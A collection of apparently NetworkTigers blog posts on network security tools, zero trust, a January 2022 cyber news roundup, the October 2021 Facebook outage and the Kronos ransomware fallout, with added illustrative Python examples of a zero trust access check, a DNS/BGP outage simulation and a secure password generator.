The amount of damage done can be limited if cyberattackers can’t access your network. However, apart from preventing unauthorized access, you also need to know that authorized users can be a threat. Access control allows you to limit resources and user access to network parts that only apply to individual users’ tasks so that you boost your network security. 

  3. Email security

Email security focuses on identifying human-related security weaknesses. Attackers convince email recipients to download malware into the integrated network or send them sensitive data using smartphones or desktops via phishing strategies. Email security helps identify suspicious emails, prevent sharing of important information, and blocks attacks. 

  4. Security information and event management (SIEM)

Sometimes pulling the correct data from different resources and tools can be challenging when you don’t have time. SIEM tools give responders the information they need to act quickly.

  5. Data loss prevention (DLP)

The human element is usually the weakest link in network security. DLP policies and technologies prevent employees and other users from misusing and allowing sensitive information out of the network or compromising the information. 

  6. Virtual private network (VPN)

VPN tools authenticate communication between an endpoint device and secure networks. Generally, remote-access VPNs use Secure Sockets Layer (SSL) or IPsec authentication. This creates an encrypted line that blocks unauthorized people from eavesdropping.

  7. Intrusion prevention systems

These systems scan and analyze network packets/traffic constantly so that threats can be identified and responded to immediately. The systems also store a database of known attack methods to allow organizations to recognize attacks quickly. 

  8. Anti-malware software

These tools are designed to identify dangerous programs and prevent them from infecting networks and spreading. Anti-malware software also resolves malware infections to reduce damage to your network.

  9. Firewalls

Firewalls act like gates that secure the borders between the internet and your network. They also manage network traffic and block unauthorized traffic while allowing through authorized traffic.

Network security monitoring tools help organizations safeguard systems, networks, and data. Cisco ASA and NGFW firewalls offer superior visibility into network traffic, allowing threat responders to expose unauthorized data exfiltration exploits and encrypted attacks.


Zero Trust: What it is and why it matters


Cybercrime, phishing attempts, and security hacks are all on the rise worldwide. These data breaches can be costly to businesses and individuals. They leech your valuable time, energy, and information, as well as revenue and finances. Over the next five years, the cost of cybercrime is expected to rise by 15% per year. If trends continue as expected, this will lead to a $10.5 trillion cost annually by 2025. 

Enter zero trust cybersecurity. Zero trust is an attempt to meet the moment globally. Zero trust methodology aims to address both the constantly evolving methods of cybercriminals, as well as the shifting needs of businesses, governments, and consumers. 

What is Zero Trust Cybersecurity?

Zero trust is similar to a zero tolerance policy, in that it assumes risk can come from anywhere, at any time. Most traditional security models grant some kind of lasting trust to users logging in from recognized networks, locations, or IP addresses. The zero trust model, however, assumes there is no network edge, and therefore there can be no lasting reliability. 

Instead, zero trust requires that all users, whether inside or outside an organization’s network, have their credentials be constantly checked, authenticated, and validated. This continual reauthorization is necessary before accessing or downloading any files, applications, or data within the protected network.  

Origins of Zero Trust

Zero trust was invented by John Kindervag, widely considered one of the world’s foremost cybersecurity experts. Kindervag is currently Field CTO with Palo Alto Networks after years at Forrester Research. The creation of the zero trust model is attributed to his field work as a cybercrime analyst. It has since been adopted by Google, Coca Cola, many airlines, and more. 

Notably, the zero trust model has also been recommended by the US House of Representatives. After the disastrous OPM data breach, the House issued an official recommendation that all government agencies adopt the zero trust model.

Example of a Zero Trust System

To understand how zero trust works, Google has compared the model to going to the airport. Traditionally, at the airport, you must present your identification and ticket to security before accessing the gates. This would be the equivalent of sharing your IP address (like a passport, to prove who you are), as well as your authorized destination (your ticket, showing where you plan to go). In a zero trust model, every time you log in, you must show these credentials and have them be authenticated. Similarly, every time you fly, you have to present the same proofs, even if you have flown from that airport, and to the same destination, before. This re-authentication is what sets zero trust apart from traditional network security, which assumes that users who have logged in (or checked in) once before can continue to be trusted.  

Additionally, gate access is restricted in the zero trust model, under this airport metaphor. Gone would be the option to wander freely from gate to gate, once you have presented your credentials once at security. Instead, even authorized users can only access the specific applications and destinations that they requested upon entry. This extra step limits the amount of damage that an impersonator would be able to do, assuming that they were able to evade detection at the initial checkpoint. 
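The airport checkpoint above, as an added example that is not NetworkTigers’ code: a per-request gatekeeper in the zero trust style (short-lived signed credential, second factor, managed device, and only the specific resource that was requested), beside the perimeter-style check the article contrasts it with. The signing key, users, devices and resource names are constructed for illustration.

```python
"""Added example, not NetworkTigers' code: every request re-validates a
short-lived signed credential, the second factor, the device and the specific
resource requested; nothing is trusted because an earlier request succeeded.
All keys, users, devices and resources below are constructed for illustration."""
import hashlib
import hmac
from dataclasses import dataclass

SIGNING_KEY = b"constructed-demo-key"   # assumption: the authenticator's key
CREDENTIAL_TTL = 300                     # seconds before reauthentication is forced
MANAGED_DEVICES = {"laptop-a1", "laptop-b7"}
# The "gate" each user declared at check-in: anything else is denied even with
# a perfectly valid credential, which is what limits an impersonator's reach.
AUTHORIZED = {"alice": {"payroll-app"}, "bob": {"wiki", "ticketing"}}


def _signature(user, device, issued_at):
    """HMAC over the credential fields so a tampered credential is detectable."""
    msg = f"{user}|{device}|{issued_at}".encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()


@dataclass
class Credential:
    user: str
    device: str
    issued_at: int        # unix time the credential was minted
    mfa_verified: bool    # strong second factor completed for this credential
    signature: str


def issue_credential(user, device, mfa_verified, now):
    """Mint a short-lived credential after the user authenticates."""
    return Credential(user, device, now, mfa_verified,
                      _signature(user, device, now))


def zero_trust_decision(cred, resource, now):
    """Return (allowed, reason). Runs on every request, not once per session."""
    expected = _signature(cred.user, cred.device, cred.issued_at)
    if not hmac.compare_digest(cred.signature, expected):
        return False, "credential tampered or forged"
    if now - cred.issued_at > CREDENTIAL_TTL:
        return False, "credential expired: reauthenticate"
    if not cred.mfa_verified:
        return False, "strong second factor required"
    if cred.device not in MANAGED_DEVICES:
        return False, "unmanaged device"
    if resource not in AUTHORIZED.get(cred.user, set()):
        return False, "resource not authorized for this user"
    return True, "allow"


class PerimeterNetwork:
    """The contrast: once a user is inside (a VPN login), every resource is open."""
    def __init__(self):
        self.logged_in = set()

    def login(self, user, password_ok):
        if password_ok:
            self.logged_in.add(user)

    def decision(self, user, resource):
        if user in self.logged_in:
            return True, "inside the perimeter: allow"
        return False, "outside the perimeter"


def blast_radius(cred, now, resources):
    """Which of the given resources one compromised account reaches under each model."""
    zero_trust = [r for r in resources if zero_trust_decision(cred, r, now)[0]]
    perimeter = PerimeterNetwork()
    perimeter.login(cred.user, True)
    inside = [r for r in resources if perimeter.decision(cred.user, r)[0]]
    return zero_trust, inside


if __name__ == "__main__":
    cred = issue_credential("alice", "laptop-a1", True, now=1000)
    print(zero_trust_decision(cred, "payroll-app", now=1100))   # allowed
    print(zero_trust_decision(cred, "wiki", now=1100))          # not her gate
    print(zero_trust_decision(cred, "payroll-app", now=1400))   # expired
    print(blast_radius(cred, 1100, ["payroll-app", "wiki", "ticketing"]))
```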

Differences Between Zero Trust and VPN Networks

Both VPNs and zero trust can be deployed to enable remote users to access confidential materials. This makes both systems especially helpful as more companies continue to ask employees to work from home. Both VPNs and zero trust models are attempts to manage the increased risk from having so many different remote access points. 

However, VPNs and zero trust security manage this risk in different ways. A VPN creates a remote perimeter. It grants access to all authorized users and managed devices who log in through the VPN. Zero trust, by contrast, automatically restricts access to all users, assuming there is no trusted network. 

While zero trust is a newer concept in cybersecurity, and thus less proven than VPN technology, it is an attempt to restrict the amount of damage that a hacker can do, once they have gained access to the trusted network created by the VPN. 

Benefits of Zero Trust

Zero trust upends the traditional perimeter security model by restructuring the framework of risk. Some benefits include:

  1. Portability – The zero trust model can be accessed by users all over the globe. Gone are the physical limitations of needing a dedicated office space and company network.
  2. Flexibility – A zero trust model has less initial set up for users than requesting access to a VPN, minimizing onboarding time. 
  3. Security – Zero trust is designed to mitigate the risks of network perimeters, or the “blast radius” if a breach does occur. 
  4. Invisibility – Despite the multiple authentications necessary, zero trust should be seamless for users. They should be able to sign in and use a strong second factor in order to conduct business as usual. 

Evolution of Zero Trust Security 

As more businesses and users utilize hybrid cloud technology to store data, zero trust is a necessary evolution within the cybersecurity landscape to help mitigate the associated increased risk. When done correctly, zero trust lives up to its motto of “never trust, always verify” and can create a stronger, safer online experience for companies, governments, and individuals.

Cybersecurity News week ending 9 Jan 2022 ~ NetworkTigers


Cybersecurity news provided by NetworkTigers on Monday, 10 January 2022.

SAN MATEO, CA — Attackers attempt hacks by mailing USB drives, new Java vulnerability similar to Log4Shell, New Mexico county hit with cyberattack, years old Uber exploit finally fixed, attackers using Google Docs to spread malware, ZLoader malware in circulation, music website “DatPiff” hacked, 2021 cyberattack against UK Ministry of Defence academy revealed, Arkansas hospital payroll offline due to Kronos hack, largest media provider in Portugal attacked, Florida hospital system breached.

Attackers attempt hacks by mailing USB drives

The FBI has issued a warning to retailers that FIN7, a notorious Eastern European hacking collective, has been mailing envelopes containing USB drives to businesses that are purported to include COVID-19 information from the Department of Health and Human Services or Amazon. However, inserting the USB drive in fact injects malicious code into the user’s computer that can be used to gather data and initiate a ransomware attack. Read more.

New Java vulnerability similar to Log4Shell

A serious new Java bug has been detected that has the same root cause as the currently-trending Log4Shell vulnerability, according to researchers. A successful exploit of the bug can allow an attacker to initiate unauthenticated remote code execution. All users running the popular H2 Java SQL database are urged to update their system immediately. Read more.

New Mexico county hit with cyberattack

Bernalillo County, the most heavily populated in the state of New Mexico, has had its services disrupted by a ransomware attack on Wednesday morning. The attack has resulted in many government employees working remotely as buildings remain closed. Safety services are still operational due to backup protocols being in place, although many government services are offline due to system disruption. Read more.

Years old Uber exploit finally fixed

An exploit that would allow criminals to easily send emails to targets from Uber’s official network has finally been closed. However, researchers note that this exploit has been open since 2015 and may have already been used to trick Uber users into providing personal information and payment data. Uber users are encouraged to change their passwords and use challenging login credentials. Read more.

Attackers using Google Docs to spread malware

The comments feature of Google Docs has reportedly been used to spread malware and malicious links that primarily target Outlook users, according to researchers at security firm Avanan. The vulnerability has been noted since October, but has not been fixed by Google. Attackers use the comment feature to send a notification email to their target. The nature of the email sent makes it difficult to determine whether or not it can be trusted. Read more.

ZLoader malware in circulation

ZLoader is a Trojan that is used to steal passwords, cookies and other sensitive information from infected systems. However, a new ZLoader campaign spearheaded by the malware gang Malsmoke is hiding the Trojan in a new and more difficult to spot way. ZLoader is being hidden within a “legitimate remote management program from Atera pretending to be a Java installation.” Read more.

Music website “DatPiff” hacked

Free mixtape hosting website “DatPiff” has been hacked, with the passwords for more than 7.5 million users being sold online. Users can check Have I Been Pwned to determine if their accounts were affected by the breach. DatPiff account holders are being encouraged to change their passwords and login credentials to words and phrases that do not share any similarity with previously used credentials. Read more.

2021 cyberattack against UK Ministry of Defence academy revealed

In March of 2021, a cyberattack was levied against the UK Ministry of Defence (MoD) Academy that reportedly had a significant operational effect. The attack was revealed by a retired military official; the perpetrators are still unknown, leaving the possibility of state-sponsored hacking on the table. As of today, the MoD’s IT infrastructure is still being restored while stronger defenses are being implemented. Read more.

Arkansas hospital payroll offline due to Kronos hack

The University of Arkansas for Medical Sciences (UAMS) has been reeling from the effects of December’s cyberattack on Kronos, with the hospital struggling to maintain timekeeping records and pay its employees. While the absence of Kronos’ services has been a challenge, the hospital reports that thus far all workers have been paid on time. The UAMS is the state of Arkansas’ largest public employer. Read more.

Largest media provider in Portugal attacked

Impresa, owner of the largest television station and newspaper in Portugal, has reportedly been the victim of a ransomware attack. National cable TV broadcasts are unaffected, but the company’s streaming capabilities have been taken down. The company has also had its Twitter account hacked by the attackers, who have been using it to taunt the company and report to followers that the hijackers still have access to the company’s data. The ransomware group Lapsus$ is believed to be responsible for the attack. Read more.

Florida hospital system breached

Florida-based hospital system Broward Health has reported that it suffered a data breach on October 15th of 2021. The breach is said to have taken place through a third-party organization that had access to Broward Health’s network. The compromise allowed unauthorized users to both access and steal Social Security numbers, patient health data, names, addresses, banking information and more. No misuse of the data has been reported so far. Read more.


Was Facebook hacked on 4 October 2021?


If you opened your computer, phone or laptop and saw that social media giant Facebook no longer existed, how would you feel? For some, there might be joy at feeling finally set free from screen time. For others – especially the over 90 million small business owners with Facebook pages – there might be concern. For everyone, there would likely be a sense of shock. 

If you did log in to Facebook on 10/4/21, you may have experienced a taste of that when you saw the platform was no longer reachable. Facebook was inaccessible on 10/4/21 for many hours, with the domain name showing that it no longer existed. Many users were redirected to an error message that showed “Server can’t find facebook.com”, instead of seeing a typical “trouble loading content” page. This led many people to believe that Facebook was hacked or had been taken down, perhaps permanently. But what actually happened?

What Happened with Facebook on 10/4/21?

The company’s DNS servers were unreachable for about 6 hours on 10/4/21. The outage began around 1 pm Eastern Time, and largely affected US-based users, with around 1.7 million problem reports flowing in. The outage was also global, with other countries, including Germany, the Netherlands, the United Kingdom, and Italy, reporting that the platform had stopped functioning. There were overall 5.6 million problem reports worldwide. 

The issue was resolved by around 6:30 pm Eastern Time. However, even this loss of a few hours was jarring for many users, who are accustomed to checking Facebook throughout the day. With 3.5 billion people using Facebook nearly every day, a loss of connection for even a few hours can have a massive effect. 

Other Platforms Affected by the Shutdown

Due to the consolidation of social media, Facebook’s outage also meant that many other popular communication platforms were taken down all at once. Instagram, WhatsApp, Oculus VR, and Messenger were all also inaccessible during the 6 hour period. 

Facebook’s Statement About the Shutdown

According to a statement released by Facebook’s Santosh Janardhan, the error was caused by a routine maintenance that went awry. Janardhan posted after the fact:

“During one of these routine maintenance jobs, a command was issued with the intention to assess the availability of global backbone capacity, which unintentionally took down all the connections in our backbone network, effectively disconnecting Facebook data centers globally.” 

From there, a glitch in the system apparently allowed the company’s DNS servers to become unreachable publicly, even though they were still operational. With the backbone down, the DNS servers mistakenly read their connection to the data centers as unhealthy and, in response, withdrew their Border Gateway Protocol (BGP) advertisements, so the rest of the internet no longer had a route to them. This slipup caused Facebook to show as unavailable, and the domain name was even automatically listed as for sale on various marketplaces. 

Because Facebook has linked their own internal networks, the outage had far-reaching consequences. Due to the physical and system security Facebook imposes on its own data centers, engineers working to fix the problem were not able to remedy the situation immediately. Janardhan continued to explain the situation as:

“Our primary and out-of-band network access was down, so we sent engineers onsite to the data centers to have them debug the issue and restart the systems. But this took time, because these facilities are designed with high levels of physical and system security in mind. They’re hard to get into, and once you’re inside, the hardware and routers are designed to be difficult to modify even when you have physical access to them. So it took extra time to activate the secure access protocols needed to get people onsite and able to work on the servers. Only then could we confirm the issue and bring our backbone back online.”

According to Facebook’s official statements, there was no external hack that brought about the temporary shutdown, simply an internal and routine maintenance error with the interconnected DNS server and its ability to read BGP. The mishap was extended by the company’s own stringent security measures. 
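The failure chain described in the statements above, as an added example that is neither Facebook’s nor NetworkTigers’ code: a simplified model in which the authoritative DNS servers announce their address block with BGP only while their path to the data centers looks healthy, a faulty backbone command drops every link, the announcement is withdrawn, and lookups fail even though the DNS servers never stop running. The prefix, ASN and hostnames are constructed (documentation and private ranges), not Facebook’s.

```python
"""Added example, not Facebook's or NetworkTigers' code: a toy model of the
DNS/BGP cascade. Prefix, ASN and hostnames are constructed, not real."""


class Backbone:
    """Links from the DNS edge to the data centers."""
    def __init__(self, data_centers):
        self.links = {dc: True for dc in data_centers}

    def assess_capacity(self, faulty_command):
        """The 'routine maintenance job'. A correct command only reads link
        state; the faulty one unintentionally takes down every connection."""
        if faulty_command:
            for dc in self.links:
                self.links[dc] = False
        return dict(self.links)

    def healthy(self):
        return any(self.links.values())


class InternetRoutingTable:
    """What the rest of the internet knows: announced prefix -> origin AS."""
    def __init__(self):
        self.routes = {}

    def announce(self, prefix, asn):
        self.routes[prefix] = asn

    def withdraw(self, prefix):
        self.routes.pop(prefix, None)

    def has_route(self, prefix):
        return prefix in self.routes


class AuthoritativeDns:
    """Serves the zone; advertises its prefix only while the backbone looks healthy."""
    def __init__(self, prefix, asn, backbone, table, zone):
        self.prefix, self.asn = prefix, asn
        self.backbone, self.table, self.zone = backbone, table, zone
        self.running = True   # the servers themselves never go down in this story

    def health_check(self):
        # The safety behaviour that backfired: an unhealthy data-center path is
        # treated as "this DNS site is bad, stop advertising it to the world".
        if self.backbone.healthy():
            self.table.announce(self.prefix, self.asn)
        else:
            self.table.withdraw(self.prefix)
        return self.table.has_route(self.prefix)


def resolve(name, dns, table):
    """A public resolver: it must first have a route to the DNS server's prefix.
    Returns the answer, or None for the 'Server can't find' outcome."""
    if not table.has_route(dns.prefix) or not dns.running:
        return None
    return dns.zone.get(name)


def simulate(faulty_command):
    """Run the maintenance job and report resolution before and after it."""
    backbone = Backbone(["dc-1", "dc-2", "dc-3"])
    table = InternetRoutingTable()
    dns = AuthoritativeDns("203.0.113.0/24", 64500, backbone, table,
                           {"www.example.social": "198.51.100.10"})
    dns.health_check()
    before = resolve("www.example.social", dns, table)
    backbone.assess_capacity(faulty_command)
    dns.health_check()
    after = resolve("www.example.social", dns, table)
    return {
        "before": before,
        "after": after,
        "dns_still_running": dns.running,
        "prefix_advertised": table.has_route(dns.prefix),
    }


if __name__ == "__main__":
    print(simulate(faulty_command=False))   # lookups keep working
    print(simulate(faulty_command=True))    # server running, prefix gone, lookup None
```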

Rumors About the Facebook Hack

Many rumors were spread during the shutdown about what had caused it. Some common ones you may have heard were that:

  • A teenage Chinese hacker caused the shutdown. This misinformation was ironically spread largely via Facebook posts after the fact. 
  • The outage was linked to the testimony recently shared about the platform’s widespread apathy about the hate-mongering and misinformation it fosters, as well as the harm it does to teenagers’ self-images, and the genocide it reportedly helped incite in Myanmar. The day before the shutdown, Facebook whistleblower Frances Haugen revealed her identity in a 60 Minutes interview. The timing of the outage happening on the very next day caused some to speculate that the two events were related. 
  • The private data of 1.5 billion Facebook users was put up for sale following the hack. This idea was spread by Senator Marsha Blackburn of Tennessee in her remarks at a Senate Subcommittee hearing. Data including users’ email addresses, locations, phone numbers, gender, and other identifying information was purported to be for sale. This breach, however, remains unverified by several fact-checking sources. 

Effects of the Facebook Shutdown

The mass outage on 10/4/21 caused Facebook shares to drop by 4.9%, representing a loss of $40 billion to the company’s net worth.

Besides the financial consequences, many people across the globe rely on Facebook Messenger as well as WhatsApp to reach friends and family in other countries. The outage affected many people’s ability to know what was happening with loved ones internationally. And as the coronavirus has revealed our increasing reliance on digital connections, Facebook’s outage was even more poignant during this time. If tech giants continue to consolidate communication platforms, we may well see many more issues moving forward with our ability to stay connected.

What are the effects of the Kronos ransomware attack?


The December 11th ransomware attack levied against Ultimate Kronos Group (UKG), commonly simply referred to as “Kronos,” has left organizations, businesses and individuals to fend for themselves as the effects of the human resource company’s now limited operations leave paychecks in limbo. As the new year begins, many are left still struggling after weeks without service due to the hack.

As expected, the effects of the Kronos service outage have had serious consequences across organizations both private and public. Many workers have experienced disruptions in pay, and companies are struggling to keep accurate records when it comes to hours worked, overtime and more.

Healthcare and the Kronos hack

Healthcare organizations seem to have been disproportionately affected by the disappearance of Kronos’ services. Many employees are less than optimistic when it comes to their faith in Kronos and their employers to get back on track.

Staff at University of Florida Health (UF Health) have experienced two weeks of payroll inaccuracies, with some workers looking to leave the facility and find work elsewhere as the hospital flounders with maintaining the books. 

“People are fed up. They’re gonna go. They’re not going to stay. No one wants to work for free,” said a UF Health employee who chose to remain anonymous for fear of the hospital retaliating.

“If we are recording our hours on timesheets and you know already how much we’re making and you can calculate that with a calculator, then we should do that,” the UF Health employee continued.

UF Health maintains that it is waiting for instructions from Kronos, and is doing the best it can logging hours manually. Their statement does little to comfort those who already live paycheck to paycheck.

MaineHealth, another healthcare provider and one of the state of Maine’s largest employers, has also been grappling with the effects of the Kronos hack.

“Though this ransomware attack affects employers worldwide, it is especially unfortunate that our care team members have to deal with this at a time when the pandemic is at its peak in Maine,” said chief financial officer of MaineHealth Al Swallow.

Staff members at Atlanta, Georgia’s Grady Memorial Hospital have reported receiving checks for as little as 75 cents. Some have not received checks at all.

As COVID-19 infections soar and hospital staff regularly maintain hours far in excess of their scheduled time, the additional economic pressure being experienced by those who aren’t receiving pay is placing more stress on a workforce that is already beyond the breaking point.

Public services and the Kronos hack

School districts, police departments and other public services are also feeling the pressure as the Kronos hack closes in on its third week of service disruption.

Texas' Fort Worth Independent School District has resorted to "old fashioned" methods of timekeeping. The district's executive director of external and emergency communications, Claudia Garibay, said that the district is "working with our division of technology to develop a time capture application that we'll have here in the near future."

Private companies and the Kronos hack

Nestle and Tesla are two of the largest companies affected by the Kronos hack. 

Nestle spokeswoman Dana Stambaugh said that “this (hack) will have no impact on our ability to pay our employees.”

Tesla has not made a statement regarding the hack, nor has CEO Elon Musk made any mention of the hack officially or on his Twitter feed.

The effects of the Kronos hack vary from company to company, depending on how deeply Kronos services are integrated into its operations and which of Kronos' tools it uses.

What is Kronos doing about the ransomware attack?

For its part, Kronos has kept a public log of its restoration process.

While transparency and a detailed list of the company's efforts are laudable in a world where hacks and breaches quickly fade from both headline news and PR statements, the online archive seems perfunctory. Considered alongside Kronos' initial instruction for clients to, more or less, figure out how to navigate its absence on their own, the company's updates give the impression of a box checked to save face rather than a carefully constructed plan.

Kronos has provided a small suite of “Interim Solutions for Time and Scheduling” that include Excel files and a piece of software that will collect and store time clock punches for when services are restored. 

Many of the steps that Kronos is instructing businesses to undertake to restore services require downloading checklists, watching videos, connecting with a representative from the company and learning how to manage new methods by which to collect payroll data.

Kronos' tools and recommendations put the real-world cleanup of its outage squarely on its customers. This underlines how, when a vendor entrusted with critical tools and data has no protocols in place for a major cyberattack, responsibility for the fallout trickles down to paying customers rather than staying with the vendor.

Kronos has reported on its status update page that those affected by the ransomware attack can expect to hear from a company agent who will assist them directly in restoring services between January 3rd and January 7th.

However, a post published on January 1st, which opened with a tone-deaf wish for a "happy new year," stated that more details would be forthcoming "tomorrow," which would have been January 2nd.

As of the morning of January 3rd, no new correspondence has been posted.

The future

Undoubtedly, organizations across the country are eagerly awaiting a return to regular service as they continue to make do with pen-and-paper records, unlogged hours and no cohesive protocols for operating without human resources services. For them, these updates at least provide progress reports to pass on to their workforces as assurance that work is underway.

However, the workers and employees directly affected by missing, lacking or inaccurate paychecks likely aren’t interested in Kronos’ “good faith” efforts to fix the mess after the fact. One can hope that the scrambling taking place in the wake of this hack will provide an incentive for more major companies to develop strict, detailed procedures to shield their customers from the effects of cyberattacks, whether successful or merely attempted.

Barring a market-wide enlightenment, however, until major companies feel sufficient economic or regulatory pressure to strengthen their cybersecurity protocols and accept responsibility for their inaction, 2022's ransomware and cyberattack landscape is likely to deviate little from the trends set over the previous year.

How to avoid cybercrime

Cybercrime doesn't just happen to major corporations, in spite of what headline news may imply. Small businesses are often targeted by hackers because of their limited resources and their belief that their inconspicuous size means they need not invest in security. Here are some tips to help you stay safe online:

Use strong, random passwords. Use a password generator to create passwords that cannot be guessed, and don't reuse a password across multiple websites or accounts.

Keep up to date on how to identify phishing scams and malicious links. The 2021 Robinhood breach began when a criminal socially engineered a customer support employee over the phone and obtained access to internal support systems. Cybersecurity training is key.

Check in regularly with cybersecurity news blogs and online resources.

Keep your operating systems, software and apps updated, and replace hardware that no longer receives security updates. Purchasing refurbished equipment from a reputable supplier makes that affordable without breaking your budget.
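The first tip above says to use a password generator rather than choosing passwords by hand. The following is an added example, written for this page and not code from the original article or from Kronos, showing what such a generator looks like when done correctly: it draws characters from the operating system's cryptographic random source (Python's `secrets` module, never `random`) and reports the resulting entropy so you can see why length and alphabet size matter. The short word list is constructed for the example; a real passphrase generator would load a list of several thousand words.

```python
import math
import secrets
import string
from typing import Sequence

# Character set for generated passwords: letters, digits and the printable
# punctuation most sites accept. 26 + 26 + 10 + 32 = 94 symbols.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

# Constructed word list so the example runs offline. Real generators use
# lists of several thousand words; entropy per word is log2(list size).
WORDS = ["anchor", "basil", "cobalt", "delta", "ember", "falcon", "glacier", "harbor"]


def generate_password(length: int = 20, alphabet: str = ALPHABET) -> str:
    """Return a password of `length` symbols chosen uniformly from `alphabet`.

    secrets.choice() reads from the OS CSPRNG. The `random` module is a
    seeded, predictable generator and must never be used for credentials.
    """
    if length < 1:
        raise ValueError("length must be positive")
    if len(alphabet) < 2:
        raise ValueError("alphabet must contain at least two symbols")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def generate_passphrase(words: int = 6, wordlist: Sequence[str] = WORDS, sep: str = "-") -> str:
    """Return a passphrase of `words` words chosen uniformly with replacement.

    Choosing with replacement keeps each word independent, so the entropy is
    simply words * log2(len(wordlist)).
    """
    if words < 1:
        raise ValueError("words must be positive")
    return sep.join(secrets.choice(wordlist) for _ in range(words))


def entropy_bits(length: int, alphabet_size: int) -> float:
    """Entropy in bits of a uniformly random string: length * log2(alphabet_size).

    This only holds for generated secrets; a human-chosen password of the same
    length has far less entropy because its characters are not independent.
    """
    return length * math.log2(alphabet_size)


def meets_minimum(length: int, alphabet_size: int, min_bits: float = 80.0) -> bool:
    """True if a uniformly random string of this shape reaches `min_bits` of entropy."""
    return entropy_bits(length, alphabet_size) >= min_bits


if __name__ == "__main__":
    pw = generate_password(20)
    print(pw, f"({entropy_bits(20, len(ALPHABET)):.1f} bits)")
    pp = generate_passphrase(6)
    print(pp, f"({entropy_bits(6, len(WORDS)):.1f} bits with this tiny list)")
    # A 6-word phrase from a 7776-word list (the size of a common diceware
    # list) would give about 77.5 bits, comparable to a 12-character random
    # password from the 94-symbol alphabet.
    print(f"{entropy_bits(6, 7776):.1f} bits vs {entropy_bits(12, 94):.1f} bits")
```

Note that the entropy figure is only meaningful because every symbol is drawn independently and uniformly from the CSPRNG; the same arithmetic applied to a password a person typed in would overstate its strength.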

Sources